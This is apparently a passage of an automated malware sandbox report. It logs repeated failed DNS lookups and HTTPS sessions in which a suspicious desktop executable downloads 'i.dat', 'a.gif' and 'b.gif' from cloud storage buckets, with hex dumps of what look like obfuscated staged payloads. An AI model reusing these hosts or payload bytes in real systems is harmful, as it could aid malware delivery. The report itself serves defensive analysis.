                                                                                Jan 10, 2025 02:28:23.272474051 CET1.1.1.1192.168.2.50xab4cName error (3)ufozdv.netnonenoneA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:28:28.534584999 CET1.1.1.1192.168.2.50xa4caName error (3)ufozdv.netnonenoneA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:28:34.485044956 CET1.1.1.1192.168.2.50xbe45Name error (3)ufozdv.netnonenoneA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:28:40.496840000 CET1.1.1.1192.168.2.50x1Name error (3)ufozdv.netnonenoneA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:28:44.859705925 CET1.1.1.1192.168.2.50x4ee4Name error (3)ufozdv.netnonenoneA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:28:49.422720909 CET1.1.1.1192.168.2.50xb98aName error (3)ufozdv.netnonenoneA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:28:54.411616087 CET1.1.1.1192.168.2.50x1ec5Name error (3)ufozdv.netnonenoneA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:28:59.405925989 CET1.1.1.1192.168.2.50xb790Name error (3)ufozdv.netnonenoneA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:29:04.432322979 CET1.1.1.1192.168.2.50x1afcName error (3)ufozdv.netnonenoneA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:29:09.509416103 CET1.1.1.1192.168.2.50xb49aName error (3)ufozdv.netnonenoneA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:29:14.408262014 CET1.1.1.1192.168.2.50x74f4Name error (3)ufozdv.netnonenoneA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:29:19.445544004 CET1.1.1.1192.168.2.50x3f50Name error (3)ufozdv.netnonenoneA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:29:24.410254002 CET1.1.1.1192.168.2.50x2267Name error (3)ufozdv.netnonenoneA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:29:29.409614086 CET1.1.1.1192.168.2.50x5646Name error (3)ufozdv.netnonenoneA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:29:29.417352915 CET1.1.1.1192.168.2.50x60a2No error (0)upitem.oss-cn-hangzhou.aliyuncs.comsc-29h5.cn-hangzhou.oss-adns.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                                                                Jan 10, 2025 02:29:29.417352915 CET1.1.1.1192.168.2.50x60a2No error (0)sc-29h5.cn-hangzhou.oss-adns.aliyuncs.comsc-29h5.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                Jan 10, 2025 02:29:29.417352915 CET1.1.1.1192.168.2.50x60a2No error (0)sc-29h5.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com118.178.60.103A (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:29:34.405073881 CET1.1.1.1192.168.2.50x7898Name error (3)ufozdv.netnonenoneA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:29:39.429744005 CET1.1.1.1192.168.2.50x61eeName error (3)ufozdv.netnonenoneA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:29:44.431638002 CET1.1.1.1192.168.2.50x828eName error (3)ufozdv.netnonenoneA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:29:49.429574966 CET1.1.1.1192.168.2.50xd18dName error (3)ufozdv.netnonenoneA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:29:54.414125919 CET1.1.1.1192.168.2.50x8bd1Name error (3)ufozdv.netnonenoneA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:29:59.414804935 CET1.1.1.1192.168.2.50xd645Name error (3)ufozdv.netnonenoneA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:30:04.520766020 CET1.1.1.1192.168.2.50x25a2Name error (3)ufozdv.netnonenoneA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:30:09.465814114 CET1.1.1.1192.168.2.50x26ccName error (3)ufozdv.netnonenoneA (IP address)IN (0x0001)false

                                                                                HTTP Request Dependency Graph

                                                                                • tjgohh.oss-cn-beijing.aliyuncs.com
                                                                                • 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                • upitem.oss-cn-hangzhou.aliyuncs.com

                                                                                HTTPS Proxied Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.54970439.103.20.424435676C:\Users\user\Desktop\2873466535874-68348745.02.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-10 01:26:18 UTC111OUTGET /i.dat HTTP/1.1
                                                                                User-Agent: GetData
                                                                                Host: tjgohh.oss-cn-beijing.aliyuncs.com
                                                                                Cache-Control: no-cache
                                                                                2025-01-10 01:26:18 UTC558INHTTP/1.1 200 OK
                                                                                Server: AliyunOSS
                                                                                Date: Fri, 10 Jan 2025 01:26:18 GMT
                                                                                Content-Type: application/octet-stream
                                                                                Content-Length: 512
                                                                                Connection: close
                                                                                x-oss-request-id: 6780773AAF1C2D30390BB56C
                                                                                Accept-Ranges: bytes
                                                                                ETag: "5BC7F760FAAAF88924A99A88F3882597"
                                                                                Last-Modified: Thu, 09 Jan 2025 09:43:54 GMT
                                                                                x-oss-object-type: Normal
                                                                                x-oss-hash-crc64ecma: 11109194241637908710
                                                                                x-oss-storage-class: Standard
                                                                                x-oss-ec: 0048-00000113
                                                                                Content-Disposition: attachment
                                                                                x-oss-force-download: true
                                                                                Content-MD5: W8f3YPqq+IkkqZqI84gllw==
                                                                                x-oss-server-time: 3
                                                                                2025-01-10 01:26:18 UTC512INData Raw: 07 1b 1b 1f 6c 25 30 30 44 5a 57 5f 37 37 71 30 43 43 1d 53 3d 7e 31 36 5f 5c 5f 58 3f 76 39 34 5d 4d 41 5a 39 29 74 39 56 54 16 58 76 3f 31 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 56 4a 4a 4e 3d 74 61 61 15 0b 06 0e 66 66 20 61 12 12 4c 02 6c 2f 60 67 0e 0d 0e 09 6e 27 68 65 0c 1c 10 0b 68 78 25 68 07 05 47 0a 24 6d 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 04 18 18 1c 6f 26 33 33 47 59 54 5c 34 34 72 33 40 40 1e 50 3e 7d 32 35 5c 5f 5c 5b 3c 75 3a 37 5e 4e 42 59 3a 2a 77 3a 55 57 15 59 77 3e 30 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 57 4b 4b 4f 3c 75 60 60 14 0a 07 0f 67 67 21
                                                                                Data Ascii: l%00DZW_77q0CCS=~16_\_X?v94]MAZ9)t9VTXv?1>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>VJJN=taaff aLl/`gn'hehx%hG$mclllllllllllllllllllllllllllllllllo&33GYT\44r3@@P>}25\_\[<u:7^NBY:*w:UWYw>0?????????????????????????????????WKKO<u``gg!


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.54970539.103.20.424435676C:\Users\user\Desktop\2873466535874-68348745.02.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-10 01:26:19 UTC111OUTGET /a.gif HTTP/1.1
                                                                                User-Agent: GetData
                                                                                Host: tjgohh.oss-cn-beijing.aliyuncs.com
                                                                                Cache-Control: no-cache
                                                                                2025-01-10 01:26:20 UTC546INHTTP/1.1 200 OK
                                                                                Server: AliyunOSS
                                                                                Date: Fri, 10 Jan 2025 01:26:20 GMT
                                                                                Content-Type: image/gif
                                                                                Content-Length: 135589
                                                                                Connection: close
                                                                                x-oss-request-id: 6780773C8797BE32349C44AA
                                                                                Accept-Ranges: bytes
                                                                                ETag: "0DDD3F02B74B01D739C45956D8FD12B7"
                                                                                Last-Modified: Thu, 09 Jan 2025 09:43:15 GMT
                                                                                x-oss-object-type: Normal
                                                                                x-oss-hash-crc64ecma: 8642451798640735006
                                                                                x-oss-storage-class: Standard
                                                                                x-oss-ec: 0048-00000104
                                                                                Content-Disposition: attachment
                                                                                x-oss-force-download: true
                                                                                Content-MD5: Dd0/ArdLAdc5xFlW2P0Stw==
                                                                                x-oss-server-time: 16
                                                                                2025-01-10 01:26:20 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                                                Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                                                2025-01-10 01:26:20 UTC4096INData Raw: 92 94 95 15 58 67 66 8f 0d ac 9c 9e d7 25 61 ea 28 7c d1 e2 ef 25 bc 8d ce ad ad e6 24 78 4e a7 6d 84 b4 b6 ff 3d 79 ce ae f0 30 fa 9b e0 89 4f 97 e0 f5 8e 4a c5 b1 9a ca cc 32 1e 44 28 99 59 18 2b c0 75 e7 d9 d9 59 24 df a8 d2 97 6d ad c6 d3 0c 89 da e7 e8 02 e8 d8 2c a5 6b 2f b8 7a 4e d7 b4 f7 f6 f7 b0 72 66 df ac ff fe ff 48 88 07 bd b1 04 06 08 8c db 0a 0b 0c 45 83 1a 91 41 13 13 5c 9e de e8 0d 61 2a 1a 1c 55 95 12 81 94 23 23 6c a8 33 5d 78 28 2a 63 a5 28 4d 9a 31 31 cd 26 69 05 37 37 70 b2 37 bd 89 3c 3e 77 cd 54 35 13 45 45 0e ce 4d 39 ff 4a 4c b2 5b 0d 60 50 52 1b df 58 3d e2 59 59 12 d6 49 39 0e 5e 60 29 eb 66 89 d1 67 67 97 7c 4d 5b 6d 6d 26 e4 7d 21 c7 72 74 3d fb 62 21 29 7b 7b 34 f4 7b 65 35 80 82 7c 91 89 b6 86 88 c1 01 86 b9 38 8f 8f d8 1c
                                                                                Data Ascii: Xgf%a(|%$xNm=y0OJ2D(Y+uY$m,k/zNrfHEA\a*U##l3]x(*c(M11&i77p7<>wT5EEM9JL[`PRX=YYI9^`)fgg|M[mm&}!rt=b!){{4{e5|8
                                                                                2025-01-10 01:26:20 UTC4096INData Raw: 6c 81 49 b6 96 98 1c 6c ee db d5 13 d3 84 f1 5d b6 e1 84 a7 a7 2b 69 ab e7 cf 4d e3 ac 54 4e a7 ed 94 b4 b6 fa 33 7d f2 30 74 8e 6c 40 d5 d9 e2 c2 c4 8d 43 07 80 42 22 bf df 85 43 9b f4 81 9f 58 10 9d 5d 1f 30 41 ec db dc 91 55 32 ac 68 89 d3 6f e0 e9 41 e9 e9 a2 66 e1 81 4b ee f0 ca 0c 7a b7 c9 f9 b8 06 06 ef 75 dc fc fe b7 8b 0c 95 97 05 05 4a 8c a4 2d 7a 03 0c 0d 42 84 b4 35 6a 1b 14 15 5e 94 e1 e6 52 90 b0 39 86 17 20 21 57 69 6c ae 23 a5 8d 28 2a 67 a7 20 5d 8a 31 31 7e b8 31 61 93 36 38 b2 2f 4d 99 3c 3e 86 41 41 42 43 08 cc 32 63 60 01 c3 0f 68 6d b1 5a 51 f4 53 53 1c de 5b 15 cc 58 5a de 9c d6 ae 16 6f 29 ad e6 a4 2d ef 6a 59 fd 6b 6b 14 73 22 e2 3c 55 4e 36 47 b5 cc f9 6b 79 7a 33 bb 39 5a 5f 84 81 82 83 7b 90 cd 22 89 89 01 7b c4 00 83 45 34 90
                                                                                Data Ascii: lIl]+iMTN3}0tl@CB"CX]0AU2hoAfKzuJ-zB5j^R9 !Wil#(*g ]11~1a68/M<>AABC2c`hmZQSS[XZo)-jYkks"<UN6Gkyz39Z_{"{E4
                                                                                2025-01-10 01:26:20 UTC4096INData Raw: 75 9b 94 96 df 13 d5 be cb 63 88 7d 90 a1 a1 ea 2e a9 c1 30 a6 a8 56 bf 6d bc ac ae 2a 4f c9 af 32 4f 3f a5 b7 b8 cd af 3a 47 36 ad bf c0 b5 cf 8b 4f 10 7f c7 cc c9 ca 23 79 3b 31 30 5b 16 9a 58 68 f1 76 d7 d8 d9 92 58 18 bd 9f 82 a1 bd bc be bf 26 2a 2b 24 25 26 27 20 21 22 23 3c 3d 3e 3f 38 bd 7f ab dc e9 b2 72 90 d9 e6 a8 48 82 ee 33 8f c4 4f 8c d0 41 81 f1 8f e5 0a 84 f9 1e 96 c1 14 15 16 94 e0 18 15 9f b1 1d 1e 1f 68 ac 2f 15 b1 24 26 6f a1 5d 0e 6b d3 38 75 3f 31 31 7a b8 39 51 b2 36 38 71 b9 c2 c3 48 6b 73 cb 4c 1d d6 45 45 0a cc 4d 09 df 4a 4c c6 5b 2d c5 50 52 1b d9 50 15 d3 59 59 e3 5a 5c 5d 5e 17 e9 25 46 4b 2c ee 63 25 fd 68 6a 23 e5 29 4a 4f 8f 64 ad e7 75 75 3e fc 75 59 fe 7a 7c f6 8e 37 03 49 7d 06 72 cd 89 cf 40 0c 7c c3 05 80 85 0b 91 91
                                                                                Data Ascii: uc}.0Vm*O2O?:G6O#y;10[XhvX&*+$%&' !"#<=>?8rH3OAh/$&o]k8u?11z9Q68qHksLEEMJL[-PRPYYZ\]^%FK,c%hj#)JOduu>uYz|7I}r@|
                                                                                2025-01-10 01:26:20 UTC4096INData Raw: b7 ac d4 2f 87 98 99 9a d3 17 d5 96 ac 72 e9 2b ff 80 8d ee 2e e4 8d 96 e3 27 e1 8a 9f 77 f5 96 8b b5 b5 b6 b7 7f fd 9e ff be bd be bf 88 48 9e e7 e4 3a d3 4d 37 c9 ca 4e 0c b8 c8 30 c5 d1 d2 d2 d4 9d 5d 9b fc e9 25 ce c1 dd df df 27 e4 4d 65 e5 e5 e7 e7 e8 e9 d9 22 04 89 21 10 0f b9 7f fe 91 70 f7 f7 07 ec 75 fb fd fd b6 7c 3d 96 76 02 04 fa 4a 8a 05 31 fb f4 f3 41 87 02 81 94 13 13 d3 10 81 92 19 19 19 3b 1c 1d 56 96 3d 49 a7 22 24 6d af 3a a9 ac 2b 2b 59 16 6b 1c f0 79 bf 36 51 41 37 37 82 3a 1a 3b 3c 75 b7 7b 64 69 03 ce 0c 44 0e ce 14 6d 6a b4 59 49 cb 4e 50 19 d9 46 11 21 57 57 11 da 92 a4 d9 9d 17 50 28 b1 2a ea 71 51 12 66 68 21 e7 66 81 e9 6f 6f 8f 64 8d 8c 74 75 9e bd 90 86 85 33 f1 31 5a 2f b3 53 c3 3b 98 84 86 87 60 a1 ee 8b 8c c5 03 c3 b4 c1
                                                                                Data Ascii: /r+.'wH:M7N0]%'Me"!pu|=vJ1A;V=I"$m:++Yky6QA77:;<u{diDmjYINPF!WWP(*qQfh!foodtu31Z/S;`
                                                                                2025-01-10 01:26:20 UTC4096INData Raw: b7 d4 16 36 5f 98 99 9a 66 24 62 61 60 df e9 29 d7 80 cd ee 24 6c f9 f5 68 e4 28 58 db 05 f9 39 f7 90 85 fe 3e e4 9d da 38 c4 a9 be ca 84 a7 a4 a5 54 ca 71 d8 ae 4a 31 8a be c7 a8 4c 2b 8b a5 d7 b2 56 15 f7 d7 6e dc bd e1 9c de ad ea 87 df b9 e4 92 e2 81 ed c9 ea a3 6f 2a ec a7 73 37 f0 95 71 2e 82 b6 9e c2 22 8f 34 16 c4 99 66 91 64 65 94 0a b1 08 40 84 5e 2f 3c e5 dd 26 10 11 1d a4 1a 5d 9b 43 3c 29 7c 90 c4 55 9d d8 22 c9 9d 0a 24 25 6e a4 ee 2b 4c ae f7 59 2b 49 0b e9 46 e2 78 be 6a 13 78 36 8d f3 33 8a fd 77 cb 1d 66 23 6f 84 c6 3b 6c 01 4a 3f 44 0c cd ec 98 51 52 53 a9 1d dd 23 7c 31 12 d8 98 0d 01 9c ac ad ae af a8 2d e5 8b 50 ea 57 ae 06 6c 6e 6f 3c fa bb 7c f1 f7 76 77 78 31 ff b2 09 50 96 5d ad 81 82 c6 b7 4c c3 b4 48 ba 58 b8 45 c5 49 cb b4 b1
                                                                                Data Ascii: 6_f$ba`)$lh(X9>8TqJ1L+Vno*s7q."4fde@^/<&]C<)|U"$%n+LY+IFxjx63wf#o;lJ?DQRS#|1-PWlno<|vwx1P]LHXEI
                                                                                2025-01-10 01:26:20 UTC4096INData Raw: ce d5 c9 c9 c9 c5 5a 56 57 50 51 52 53 6c 6d 6e 6f 68 e5 f5 ef 2b 45 9a e3 29 64 e6 24 69 be 36 d4 b5 b5 b6 ff 3d 6b b5 3f e2 bc be bf 85 f2 10 8e 41 05 8a 4c 11 bd e2 8a c3 7a ce a9 55 11 a6 cc 95 6f d4 d7 d8 d9 93 e0 0e d2 58 25 e0 e1 e2 af 69 bc e4 81 61 e8 8c aa 2b ee d4 ef bd f2 28 be 71 3c 82 ad 9e b8 79 c2 fc 89 ad 99 66 91 64 65 94 4c 85 c5 09 45 31 d9 03 8e c5 0f 10 11 53 1c a3 14 5f 94 d9 1b 53 98 df 1f 78 5e a9 62 dc 45 65 a6 1f 27 5d f2 6b 24 9b 6c d0 49 0d 1e 32 47 29 53 0b 6b 38 4d 2d 72 bf ff 3f 73 7b 93 4d c0 d1 45 46 47 2e 08 8d 48 10 4d 07 cc 93 53 1a d8 18 71 36 1f dd 90 2e 73 3a de 67 5f 14 43 04 05 f4 2c e5 a5 69 25 51 b9 1f 02 61 d8 71 39 f1 b2 76 3c f5 b4 7a 1f 3b f2 3f 83 18 fc b9 81 f7 62 cc 0e ca a3 e0 c1 0f 42 f8 cb 81 38 91 f7
                                                                                Data Ascii: ZVWPQRSlmnoh+E)d$i6=k?ALzUoX%ia+(q<yfdeLE1S_Sx^bEe']k$lI2G)Sk8M-r?s{MEFG.HMSq6.s:g_C,i%Qaq9v<z;?bB8
                                                                                2025-01-10 01:26:20 UTC4096INData Raw: db 17 55 b6 de 1b 71 9b ee 4c d5 15 1d f8 a0 a2 a3 54 26 26 c7 a9 a9 aa aa 6f 61 62 63 7c 7d 7e 7f 78 fd 33 7e b7 3d 2c bb bc bd 4e 3c c1 3e 8a 48 45 d5 c7 c7 c8 81 4f 0b b8 c9 3e 4c d0 2e 9a 58 55 f5 d7 d7 d8 91 5f 1b a8 d9 2e 5c e0 1e aa 68 65 fd e7 e7 e8 a1 6f 2b 98 e9 1e 6c f0 0e ba 78 75 c5 f7 f7 f8 b1 7f 3b 88 f9 0e 7c 00 fe 4a 8e 45 5d 47 bf 0e 09 0a 0b 40 80 03 fd 24 10 12 75 84 59 2f 5f e8 6d 16 53 97 0d 56 9a f2 55 26 d3 a7 27 d9 6f ab 51 d2 2b 58 20 66 a4 60 39 7a b6 e6 41 32 c7 bb 3b c5 73 bf fd 1e 76 c3 a9 43 36 94 0d cd c6 10 48 4a 4b bc ce ce 2f 51 51 52 ac 1c de 97 94 94 95 96 97 90 91 92 93 ac ad ae af a8 25 35 2f eb 85 4a 23 e9 bf 26 e4 aa 05 37 3b f1 bc 02 37 34 f2 6b 37 47 af 0a 50 c8 08 93 cb 0f 4f 6e 0d 76 76 75 c6 09 5f fa 90 d9 1a
                                                                                Data Ascii: UqLT&&oabc|}~x3~=,N<>HEO>L.XU_.\heo+lxu;|JE]G@$uY/_mSVU&'oQ+X f`9zA2;svC6HJK/QQR%5/J#&7;74k7GPOnvvu_
                                                                                2025-01-10 01:26:20 UTC4096INData Raw: 56 1f 5a 7e 3d d3 99 9a d3 17 d6 8e 14 50 ae 14 e7 80 95 2e a6 41 2a aa ab ac e5 25 db 94 f1 31 7a 94 36 7e 48 31 f2 a2 f3 37 e1 9a f7 88 42 06 e3 9b 06 45 38 37 bd e9 48 33 33 ba d1 98 5a 15 9b 5f 1a 9e 5a cd d1 82 da dc 5e 3e c0 a8 20 1b e6 ac 8e 26 bf a0 ea ee 21 07 ea a6 62 f5 71 d8 f2 f4 03 b6 ff d8 8d e9 c8 2e 76 31 bb 8d 43 00 eb d9 44 06 07 40 8a f2 f4 78 2b 46 84 5b 01 98 57 30 25 9e 16 f3 0f a7 1a 1c 1d 1e 57 ad 75 06 13 af ea 62 ac ed c1 3d 60 2c 2d a5 df 0b c4 46 3a b7 7e 2e 17 bb f1 c5 d0 39 32 88 7b 64 71 0a c8 28 61 7e 0f c3 3d 6e 0b 04 c6 12 6b 18 19 d1 97 74 0a 95 9b 94 95 96 97 90 91 92 93 ac ad ae af a8 2d ef 3b 4c 79 3c 23 ef 81 0e 22 f5 b8 3f f8 a5 3c fd 87 30 f2 a0 37 f7 a4 0b 50 68 a1 7f 7c 7b c0 b5 4e cd ba 4a 4c 8c 9b 8e 8f 90 a2
                                                                                Data Ascii: VZ~=P.A*%1z6~H17BE87H33Z_Z^> &!bq.v1CD@x+F[W0%Wub=`,-F:~.92{dq(a~=nkt-;Ly<#"?<07Ph|{NJL
                                                                                2025-01-10 01:26:20 UTC4096INData Raw: 65 57 94 e2 9f d0 12 55 73 09 58 61 60 e8 2a 65 eb 2f f9 82 97 e0 2a 6e 8b f3 6e 62 63 7c 7d 7e 7f 78 f9 3b f6 a9 f1 39 79 ad f1 95 7d a6 51 a4 a5 54 ca 70 cd 8a c6 7c cf ce e6 06 ba d8 99 51 11 d5 50 16 a2 34 5c 13 d4 48 1d 1d 13 2c 2d 2e 2f 28 ad 6f ea 01 c2 eb eb 2f 21 22 23 3c 3d 3e 3f 38 b5 a5 bf 7b 15 da b3 77 24 b6 74 0d d1 29 02 04 ed 1d e4 f7 f6 42 8e cc 79 1a 47 9b da ed c3 91 d5 62 1c a0 18 1a 1b 1c 55 9d db 00 7a e1 10 e4 6d a5 e3 08 72 e9 e7 e0 e1 e2 e3 fc fd fe ff f8 75 65 7f bb d5 1a 73 bf c4 de 77 cb 98 4d c4 df 45 46 47 00 c0 3e 6f 7c 05 cb 86 ee 50 52 53 54 1d 59 12 a9 11 d3 27 78 65 38 39 f0 07 04 05 f4 2d ed 6a d9 59 6b 6b 24 e8 a7 1a 50 99 7d 77 74 75 cf 69 78 79 7a 93 b9 7c 7e 7f 39 7e 82 83 84 6d 4d 74 77 76 c2 00 81 01 be 8e 90 dd
                                                                                Data Ascii: eWUsXa`*e/*nnbc|}~x;9y}QTp|QP4\H,-./(o/!"#<=>?8{w$t)ByGbUzmrueswMEFG>o|PRSTY'xe89-jYkk$P}wtuixyz|~9~mMtwv


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.54970639.103.20.424435676C:\Users\user\Desktop\2873466535874-68348745.02.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-10 01:26:21 UTC111OUTGET /b.gif HTTP/1.1
                                                                                User-Agent: GetData
                                                                                Host: tjgohh.oss-cn-beijing.aliyuncs.com
                                                                                Cache-Control: no-cache
                                                                                2025-01-10 01:26:22 UTC546INHTTP/1.1 200 OK
                                                                                Server: AliyunOSS
                                                                                Date: Fri, 10 Jan 2025 01:26:21 GMT
                                                                                Content-Type: image/gif
                                                                                Content-Length: 125333
                                                                                Connection: close
                                                                                x-oss-request-id: 6780773DF15BB233342A39DB
                                                                                Accept-Ranges: bytes
                                                                                ETag: "2CA9F4AB0970AA58989D66D9458F8701"
                                                                                Last-Modified: Thu, 09 Jan 2025 09:43:14 GMT
                                                                                x-oss-object-type: Normal
                                                                                x-oss-hash-crc64ecma: 10333201072197591521
                                                                                x-oss-storage-class: Standard
                                                                                x-oss-ec: 0048-00000104
                                                                                Content-Disposition: attachment
                                                                                x-oss-force-download: true
                                                                                Content-MD5: LKn0qwlwqliYnWbZRY+HAQ==
                                                                                x-oss-server-time: 2
                                                                                2025-01-10 01:26:22 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                                                Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                                                2025-01-10 01:26:22 UTC4096INData Raw: 5f 58 dd 1d c6 90 d1 17 9e 99 14 9f 9f e8 24 70 eb ab e0 64 64 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 fd 3f eb 9c b1 ed f3 3f 51 9e f7 4d c4 05 d1 c5 c5 8e 4c 31 81 43 ca 47 17 86 4c 11 d9 3a 49 f3 d5 d6 21 1b d8 ae d6 66 c5 de df e0 a9 69 2c 0c cd ed e7 e8 a1 61 b7 c8 dd a6 64 37 b9 71 37 d4 aa 35 3b 34 35 36 37 30 31 32 33 cc cd ce cf c8 4d 8b 02 89 1b 0b 0b 44 84 0f 47 93 d0 1a fa 4d 32 16 17 d4 d5 d6 d7 d0 d1 d2 d3 ec ed ee ef e8 6d ab 22 b9 a1 2b 2b 64 ea 6f 3f 30 31 32 33 7c bc 77 3f 70 b4 3f dd 2e 3c 3e 77 c9 40 0a c8 85 86 8a 8b 84 85 86 87 80 81 82 83 9c 9d 9e 9f 98 1d d5 bb 10 11 d7 17 78 7d b6 9d 9f 9e 9d 2b e9 70 7d c1 69 69 22 e6 20 49 4e 87 11 59 72 73 b8 35 25 3f fb 95 5a 33 f7 a4 36 f4 42 c9 0f 8e 81 97 87 87 87 de 4a c3 01 de 86 c7 19 9a
                                                                                Data Ascii: _X$pdddefg`abc|}~x??QML1CGL:I!fi,ad7q75;45670123MDGM2m"++do?0123|w?p?.<>w@x}+p}ii" INYrs5%?Z36BJ
                                                                                2025-01-10 01:26:22 UTC4096INData Raw: 6d 6b 6a 06 df 1b 5d a2 58 50 d5 1d 73 88 18 aa a3 a4 a5 4e a1 a8 a9 aa 3b e4 2e 6a 87 73 38 fe 97 bc fd 35 5b 90 00 ad bb bc bd 41 aa f1 c1 c3 c3 41 05 b2 cf 43 8d ee fb 47 05 03 e6 98 5c df bd 6f d4 d6 3f ad d9 da db 94 56 9a fb c8 a9 6b e6 b1 59 e7 e7 a0 64 ae cf c4 a5 6d 2f f8 b9 7b f6 11 4e f7 f7 b0 72 ff c5 40 fc fe b7 89 04 ad b9 05 05 c1 02 9d b3 0b 0b 05 09 0e cf d7 14 9d a9 15 15 17 17 18 19 dd 1e 85 a7 1f 1f 21 21 22 23 9c 2d 26 27 28 61 41 eb 2c 65 a3 22 a1 8b 33 33 bf 61 12 07 70 b0 2e 3a 74 b0 33 f5 42 40 42 ab 09 bb b9 b8 d8 01 c9 8f 64 8e 82 83 9c 19 db 0f 70 75 01 1f db b5 1a 13 d7 84 a1 4a 01 9e 62 63 2c ee dd 9f 68 69 6a 23 e1 39 4a 3f 38 fa bd 36 47 b5 89 62 29 86 7a 7b 34 f8 be 0b b2 c9 01 e7 a0 bd 86 cf 05 c5 ae d3 c4 06 da ab c0 dd
                                                                                Data Ascii: mkj]XPsN;.js85[AACG\o?VkYdm/{Nr@!!"#-&'(aA,e"33ap.:t3B@BdpuJbc,hij#9J?86Gb)z{4
